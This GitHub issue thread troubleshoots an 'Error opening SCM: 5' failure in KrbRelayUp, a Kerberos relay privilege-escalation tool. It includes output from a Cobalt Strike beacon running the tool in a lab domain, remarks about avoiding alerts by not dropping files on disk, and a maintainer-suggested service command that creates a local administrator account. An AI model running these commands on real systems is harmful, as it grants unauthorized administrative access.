
Error opening SCM: 5 #10

Open
frbor opened this issue May 5, 2022 · 12 comments

Comments

@frbor

frbor commented May 5, 2022

When I run the tool I get the error Error opening SCM: 5:

[screenshot: krbrelayup-scm-5]

Do you have any idea what blocks this?

It looks like OpenSCManager fails:

IntPtr hScm = OpenSCManager("127.0.0.1", null, ScmAccessRights.Connect | ScmAccessRights.CreateService);

but I'm not sure what can cause this.

For reference, when running the same command as administrator it runs without any error.

@frbor frbor changed the title Fails with Error opening SCM: 5 May 5, 2022
@c0pp3r

c0pp3r commented May 5, 2022

I am actually having the same exact issue in a brand new DetectionLab environment in Azure. Everything works fine until that step, and I get the same SCM: 5.

@Dec0ne
Owner

Dec0ne commented May 10, 2022

Can you confirm that the high priv ticket was imported? (Use klist command)
If so, try to run krbrelayup.exe krbscm after getting this error and making sure that the ticket is indeed in klist.
Let me know if that helps.

@frbor
Author

frbor commented May 10, 2022

Thanks for replying to this issue!

I confirm that I have a ticket which I can find using klist:

Cached Tickets: (1)

#0>     Client: Administrator @ (...)

Using KrbRelayUp.exe krbscm, however, I get the same error:

KrbRelayUp.exe krbscm -s test-test2
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[-] Error opening SCM: 5

@c0pp3r

c0pp3r commented May 10, 2022

I have just confirmed the same thing as well!

beacon> shell klist
[*] Tasked beacon to run: klist
[+] host called home, sent: 36 bytes
[+] received output:

Current LogonId is 0:0x363b460

Cached Tickets: (1)

#0> Client: Administrator @ WINDOMAIN.LOCAL
Server: HOST/WIN10 @ WINDOMAIN.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 5/10/2022 12:36:16 (local)
End Time: 5/10/2022 22:36:16 (local)
Renew Time: 5/17/2022 12:36:16 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

beacon> execute-assembly /Library/Tools/KrbRelayStuff/KrbRelayUp.exe krbscm
[*] Tasked beacon to run .NET program: KrbRelayUp.exe krbscm
[+] host called home, sent: 481847 bytes
[+] received output:
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00000000
[-] Error opening SCM: 5

@vysecurity

Same, having this error.

@Dec0ne
Owner

Dec0ne commented May 18, 2022

When using the tool from memory you have to specify --ServiceCommand, since the default will be "{ToolPathOnDisk} system {DesktopSessionToSpawnCmdIn}" (i.e. C:\Tools\KrbRelayUp.exe system 1), and since it's not on disk the service will fail upon execution.
Try specifying --ServiceCommand "cmd.exe /c net user test QWERTY123 /add && net localgroup administrators test /add", for example.

@vysecurity

Wonder if you've had a look at the U2U escalation using a user account? @Dec0ne

@frbor
Author

frbor commented May 18, 2022

Not sure if the comment above was related to this issue (since the tool is on disk), but I tried with the --ServiceCommand argument as specified, and that did not help.

@c0pp3r

c0pp3r commented May 19, 2022

@Dec0ne I've been using the service command to execute a new instance of the beacon I dropped on disk. I also tried the net localgroup command you posted above and got the same result I posted previously.

@vysecurity

Same, I've always used the sc command. We don't really use the spawn CMD thing because we don't drop files on disk as it could raise alerts easier.

@naksyn

naksyn commented Sep 5, 2022

Same here; for me the issue arises when I run it from memory.

@mc-0815

mc-0815 commented Aug 29, 2023

Hi,

I have exactly the same issue.

When debugging the network traffic I noticed that the RPC bind request ends up with a bind_nak response and the error code "Invalid checksum", whose meaning according to the MS-RPCE documentation (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/6f81bffe-8fce-498a-addf-94654a57b329) is: "This rejection code is used when an unrecoverable error is detected by the underlying security package."

The ticket is in the cache, and the user has local admin privilege. However, the SCMUACBypass part seems to fail for an unknown reason.

Is anyone aware of a specific (hardening) configuration that would prevent leveraging the ticket locally via SCMUACBypass?

Any ideas would be very appreciated. Thanks.
